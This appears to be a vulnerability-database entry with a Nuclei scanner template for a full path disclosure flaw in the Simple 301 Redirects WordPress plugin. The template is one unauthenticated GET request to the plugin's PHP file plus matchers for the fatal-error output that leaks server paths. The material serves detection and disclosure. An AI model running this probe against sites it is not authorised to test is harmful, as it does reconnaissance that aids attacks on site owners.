wp-simple-301-redirects-fpd: Simple 301 Redirects - Full Path Disclosure

2026-01-08 wp simple redirects PoC Public

Description

Simple 301 Redirects WordPress plugin contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.

PoC

id: wp-simple-301-redirects-fpd

info:
  name: Simple 301 Redirects - Full Path Disclosure
  author: theamanrawat
  severity: low
  description: |
    Simple 301 Redirects  WordPress plugin contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
  impact: |
    Attackers can obtain sever file paths, aiding in further exploitation of the website.
  reference:
    - https://wordpress.org/plugins/simple-301-redirects/
  metadata:
    verified: true
    max-requests: 1
    public-www: "/wp-content/plugins/simple-301-redirects/"
  tags: debug,wordpress,wp,wp-plugin,simple-301-redirects,fpd,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/simple-301-redirects/wp-simple-301-redirects.php"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "Uncaught Error", "simple-301-redirects")'
        condition: and
# digest: 490a0046304402206e7fba4050a62fa0fda4f6fc8d56d61d25e235164882afa99e5aeefbac7f055f0220072cef8f20640a660c8d03030a653bd6d7e6a52c9e667adb3762d27bbe0d754e:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities